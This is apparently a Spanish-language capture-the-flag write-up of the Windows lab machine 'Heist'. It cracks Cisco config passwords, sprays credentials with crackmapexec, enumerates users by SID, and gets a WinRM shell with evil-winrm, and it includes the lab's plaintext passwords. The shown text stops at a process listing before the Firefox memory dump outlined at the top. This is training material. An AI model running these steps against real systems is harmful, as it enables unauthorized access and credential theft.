Heist
Heist
Skills
- Information Leakage
- Cisco Password Cracker (password7)
- SMB Enumeration - CrackMapExec
- Getting more valid system users - lookupsid.py
- Abusing WinRM - EvilWinRM
- Creating a dump file of the Firefox process - Procdump64.exe (Windows Sysinternals)
- Reading the password of the administrator user in the previously performed dump [Privilege Escalation]
Certificaciones
- OSCP
Descripción
Heist es una máquina easy windows, en la página web nos encontramos un archivo config.txt de cisco que contiene varias contraseñas, las cuales crackeamos y validamos las credenciales con crackmapexec obteniendo una válida. Con estas credenciales válidas enumeramos usuarios locales de la máquina obteniendo unas credenciales mediante las cuales nos podemos conectar a través de winrm. Una vez dentro de la máquina hacemos un dump de firefox obteniendo las credenciales del usuario Administrator
Reconocimiento
Se comprueba que la máquina está activa y se determina su sistema operativo, el ttl de las máquinas windows suele ser 128, en este caso hay un nodo intermediario que hace que el ttl disminuya en una unidad
1
2
3
4
5
6
7
8
# ping 10.129.96.157
PING 10.129.96.157 (10.129.96.157) 56(84) bytes of data.
64 bytes from 10.129.96.157: icmp_seq=1 ttl=127 time=70.3 ms
64 bytes from 10.129.96.157: icmp_seq=2 ttl=127 time=62.4 ms
^C
--- 10.129.96.157 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 62.351/66.334/70.318/3.983 ms
Nmap
Se va a realizar un escaneo de todos los puertos abiertos en el protocolo TCP a través de nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# sudo nmap -p- --open --min-rate 5000 -sS -Pn -n -v 10.129.96.157 -oG openPorts
[sudo] password for justice-reaper:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-01 11:02 CEST
Initiating SYN Stealth Scan at 11:02
Scanning 10.129.96.157 [65535 ports]
Discovered open port 80/tcp on 10.129.96.157
Discovered open port 445/tcp on 10.129.96.157
Discovered open port 135/tcp on 10.129.96.157
Discovered open port 49669/tcp on 10.129.96.157
Discovered open port 5985/tcp on 10.129.96.157
Completed SYN Stealth Scan at 11:03, 26.36s elapsed (65535 total ports)
Nmap scan report for 10.129.96.157
Host is up (0.064s latency).
Not shown: 65530 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
5985/tcp open wsman
49669/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.42 seconds
Raw packets sent: 131084 (5.768MB) | Rcvd: 26 (1.224KB)
Se procede a realizar un análisis de detección de servicios y la identificación de versiones utilizando los puertos abiertos encontrados
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# nmap -sCV -p80,135,445,5985,49669 10.129.96.157 -oN services
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-01 11:03 CEST
Nmap scan report for 10.129.96.157
Host is up (0.092s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-title: Support Login Page
|_Requested resource was login.php
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-08-01T09:04:41
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.74 seconds
Web Enumeration
Al acceder al sitio web nos encontramos con esto
Nos encontramos ante un IIS 10.0
1
2
3
# whatweb 10.129.96.157
http://10.129.96.157 [302 Found] Cookies[PHPSESSID], Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], IP[10.129.96.157], Microsoft-IIS[10.0], PHP[7.3.1], RedirectLocation[login.php], X-Powered-By[PHP/7.3.1]
http://10.129.96.157/login.php [200 OK] Bootstrap[3.3.7], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.129.96.157], JQuery[3.1.1], Microsoft-IIS[10.0], PHP[7.3.1], PasswordField[login_password], Script, Title[Support Login Page], X-Powered-By[PHP/7.3.1]
Si nos logueamos como usuario guest podemos ver varios mensajes
Si hacemos click en attachments nos encontramos un archivo config.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0Â mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh
La contraseña hasheada la podemos desencriptar mediante rainbow tables en https://hashes.com/en/decrypt/hash
1
$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent
Las contraseñas de Cisco tipo 7 las podemos decodificar en https://www.firewall.cx/cisco/cisco-routers/cisco-type7-password-crack.html
1
2
$uperP@ssword
Q4)sJu\Y8qz*A3?d
Nos creamos un fichero llamado usernames
1
2
3
rout3r
admin
hazard
Nos creamos un fichero llamado passwords
1
2
3
stealth1agent
$uperP@ssword
Q4)sJu\Y8qz*A3?d
SMB Enumeration
Enumeramos usuarios válidos usando crackmapexec y obtenemos unas credenciales válidas
1
2
3
4
5
6
7
8
9
10
11
12
13
14
# crackmapexec smb 10.129.187.132 -u usernames -p passwords --continue-on-succes
SMB 10.129.187.132 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\secret:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\secret:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\secret:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\hazard:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
Con smbmap podemos ver que recursos se comparten, en este caso no podemos conectarnos con smbclient, ni hacer monturas, ni descargar los recursos con smbmap. Lo que más me llama la atención es el directorio ROUTER
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
# smbmap --no-banner -u hazard -p stealth1agent -H 10.129.187.132 -P 445 -r 'IPC$'
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.129.187.132:445 Name: 10.129.187.132 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
./IPC$
fr--r--r-- 3 Sun Dec 31 23:45:16 1600 InitShutdown
fr--r--r-- 4 Sun Dec 31 23:45:16 1600 lsass
fr--r--r-- 4 Sun Dec 31 23:45:16 1600 ntsvcs
fr--r--r-- 3 Sun Dec 31 23:45:16 1600 scerpc
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 Winsock2\CatalogChangeListener-358-0
fr--r--r-- 3 Sun Dec 31 23:45:16 1600 epmapper
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 Winsock2\CatalogChangeListener-1d4-0
fr--r--r-- 3 Sun Dec 31 23:45:16 1600 LSM_API_service
fr--r--r-- 3 Sun Dec 31 23:45:16 1600 eventlog
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 Winsock2\CatalogChangeListener-410-0
fr--r--r-- 3 Sun Dec 31 23:45:16 1600 atsvc
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 Winsock2\CatalogChangeListener-544-0
fr--r--r-- 4 Sun Dec 31 23:45:16 1600 wkssvc
fr--r--r-- 3 Sun Dec 31 23:45:16 1600 spoolss
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 Winsock2\CatalogChangeListener-920-0
fr--r--r-- 3 Sun Dec 31 23:45:16 1600 trkwks
fr--r--r-- 3 Sun Dec 31 23:45:16 1600 W32TIME_ALT
fr--r--r-- 4 Sun Dec 31 23:45:16 1600 srvsvc
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 Winsock2\CatalogChangeListener-25c-0
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 vgauth-service
fr--r--r-- 3 Sun Dec 31 23:45:16 1600 ROUTER
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 Winsock2\CatalogChangeListener-26c-0
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 gecko-crash-server-pipe.788
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.0.110417678
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.1.3306904
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.2.133918730
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.3.197230462
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.4.31441153
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.5.16809512
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.6.64447448
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.7.27000950
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.8.97120283
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.9.160051052
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.10.189681338
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.4212.0.5762653
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.11.128723749
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.12.38365861
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.6248.0.52126038
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.6248.1.205003119
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.6248.2.179736250
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.6248.3.120847887
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.13.3147152
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.14.93222472
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.15.204834613
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.16.207272103
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.17.54858477
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.18.149115058
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.19.202206245
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.6444.0.163006652
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.6444.1.205252133
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.6444.2.90436775
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.20.69102692
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.21.26929209
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.22.57114521
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.23.168171150
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.24.37974430
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.25.39190752
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.788.26.197771899
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.6688.0.159345674
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.6688.1.56174452
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 chrome.6688.2.4265615
fr--r--r-- 1 Sun Dec 31 23:45:16 1600 PSHost.133670253465516784.6620.DefaultAppDomain.wsmprovhost
[*] Closed 1 connections
Como tenemos unas credenciales válidas podemos enumerar usuario locales de la máquina, he probado a enumerar usuarios del dominio con crackmapexec pero no he obtenido ninguno
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# impacket-lookupsid SupportDesk/hazard:stealth1agent@10.129.187.132
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Brute forcing SIDs at 10.129.187.132
[*] StringBinding ncacn_np:10.129.187.132[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
Añadimos los nuevos usuarios al archivo usernames
1
2
3
4
5
6
7
8
9
10
11
12
13
rout3r
admin
secret
hazard
Administrator
Guest
DefaultAccount
WDAGUtilityAccount
None
Hazard
support
Chase
Jason
Validamos credenciales de smb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# crackmapexec smb 10.129.187.132 -u usernames -p passwords --continue-on-succes
SMB 10.129.187.132 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\secret:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\secret:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\secret:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\hazard:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\Administrator:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\Administrator:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\Guest:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\Guest:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\Guest:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\DefaultAccount:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\DefaultAccount:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\DefaultAccount:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\WDAGUtilityAccount:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\WDAGUtilityAccount:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\WDAGUtilityAccount:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\None:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\None:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\None:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\support:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\Chase:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.187.132 445 SUPPORTDESK [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
MSRPC Enumeration
Como la máquina víctima tiene el servicio msrpc enumeramos usuarios con crackmapexec para ver si nos podemos conectar a la máquina víctima
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# crackmapexec winrm 10.129.187.132 -u usernames -p passwords --continue-on-succes
SMB 10.129.187.132 5985 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
HTTP 10.129.187.132 5985 SUPPORTDESK [*] http://10.129.187.132:5985/wsman
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\rout3r:stealth1agent
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\rout3r:$uperP@ssword
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\admin:stealth1agent
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\admin:$uperP@ssword
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\secret:stealth1agent
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\secret:$uperP@ssword
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\secret:Q4)sJu\Y8qz*A3?d
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\hazard:stealth1agent
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\hazard:$uperP@ssword
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\hazard:Q4)sJu\Y8qz*A3?d
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\Administrator:stealth1agent
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\Administrator:$uperP@ssword
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\Guest:stealth1agent
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\Guest:$uperP@ssword
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\Guest:Q4)sJu\Y8qz*A3?d
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\DefaultAccount:stealth1agent
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\DefaultAccount:$uperP@ssword
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\DefaultAccount:Q4)sJu\Y8qz*A3?d
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\WDAGUtilityAccount:stealth1agent
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\WDAGUtilityAccount:$uperP@ssword
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\WDAGUtilityAccount:Q4)sJu\Y8qz*A3?d
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\None:stealth1agent
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\None:$uperP@ssword
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\None:Q4)sJu\Y8qz*A3?d
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\Hazard:stealth1agent
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\Hazard:$uperP@ssword
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\support:stealth1agent
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\support:$uperP@ssword
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\Chase:stealth1agent
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\Chase:$uperP@ssword
WINRM 10.129.187.132 5985 SUPPORTDESK [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\Jason:stealth1agent
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\Jason:$uperP@ssword
WINRM 10.129.187.132 5985 SUPPORTDESK [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d
Intrusión
Nos conectamos a la máquina víctima usando evil-winrm
1
2
3
4
5
6
7
8
9
10
11
# evil-winrm -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d' -i 10.129.187.132
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chase
Privilege escalation
Si miramos en el escritorio del usuario chase nos encontramos este mensaje
1
2
3
4
5
6
7
*Evil-WinRM* PS C:\Users\chase\Desktop> type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.
Listamos los procesos del sistema y me doy cuenta de que está corriendo el firefox, lo cual es bastante extraño
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
*Evil-WinRM* PS C:\> ps
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
468 18 2296 5380 360 0 csrss
290 13 1980 4956 476 1 csrss
357 15 3476 14460 4396 1 ctfmon
253 14 3940 13348 3780 0 dllhost
166 9 1864 9652 0.03 5700 1 dllhost
614 32 29372 57384 956 1 dwm
1491 58 23972 78428 5156 1 explorer
1080 71 152744 230528 5.14 788 1 firefox
347 19 10228 38556 0.05 4212 1 firefox
401 34 35588 95060 0.72 6248 1 firefox
378 28 22952 59916 0.28 6444 1 firefox
355 25 16428 38760 0.13 6688 1 firefox
49 6 1508 3776 768 0 fontdrvhost
49 6 1792 4544 776 1 fontdrvhost
0 0 56 8 0 0 Idle
964 23 6012 15200 620 0 lsass
223 13 3168 10248 1584 0 msdtc
0 12 308 15928 88 0 Registry
144 8 1616 7448 5708 1 RuntimeBroker
301 16 5488 16876 5812 1 RuntimeBroker
274 14 3020 14972 6020 1 RuntimeBroker
661 32 19444 61012 5628 1 SearchUI
536 11 4904 9464 604 0 services
684 29 15008 50704 5480 1 ShellExperienceHost
440 17 4856 23860 4916 1 sihost
53 3 528 1108 264 0 smss
471 22 5824 16296 2336 0 spoolsv
201 12 2088 9560 304 0 svchost
150 9 1748 11572 356 0 svchost
85 5 896 3724 728 0 svchost
855 20 6964 22444 748 0 svchost
862 16 5228 11904 856 0 svchost
254 10 1984 7608 908 0 svchost
377 13 11724 15476 1040 0 svchost
140 7 1292 5544 1092 0 svchost
184 9 1800 7480 1108 0 svchost
228 12 2588 11128 1120 0 svchost
430 9 2744 8796 1136 0 svchost
154 7 1208 5528 1160 0 svchost
121 15 3240 7152 1200 0 svchost
215 9 2104 7468 1264 0 svchost
171 10 1788 7984 1312 0 svchost
365 17 5264 14184 1348 0 svchost
230 13 3256 8480 1372 0 svchost
305 12 2012 8760 1396 0 svchost
258 13 3408 12636 1404 0 svchost
344 14 4496 11712 1420 0 svchost
191 12 2120 11936 1508 0 svchost
163 10 2864 7364 1612 0 svchost
320 10 2476 8348 1636 0 svchost
399 32 7664 16680 1748 0 svchost
157 8 2096 7240 1824 0 svchost
194 11 1952 8064 1836 0 svchost
285 13 4228 11148 1888 0 svchost
234 11 2368 9612 1992 0 svchost
166 12 3924 10776 2396 0 svchost
179 22 2496 9808 2436 0 svchost
474 20 12532 27380 2448 0 svchost
261 13 2600 7832 2456 0 svchost
394 16 11384 20536 2480 0 svchost
133 9 1632 6472 2548 0 svchost
136 8 1516 6076 2560 0 svchost
126 7 1224 5280 2624 0 svchost
205 11 2408 8428 2652 0 svchost
233 14 4700 11756 2672 0 svchost
205 12 1836 7344 2704 0 svchost
266 19 4796 13412 2736 0 svchost
169 10 2148 13128 2772 0 svchost
464 16 3340 11740 2784 0 svchost
382 23 3340 12176 3192 0 svchost
171 9 1496 7184 3520 0 svchost
333 18 14896 31408 3524 0 svchost
206 11 2700 11832 3580 0 svchost
299 20 9384 15072 4540 0 svchost
161 9 3828 11444 4664 0 svchost
194 15 6024 10016 4704 0 svchost
173 11 2536 13172 4732 0 svchost
127 7 1576 6220 4784 0 svchost
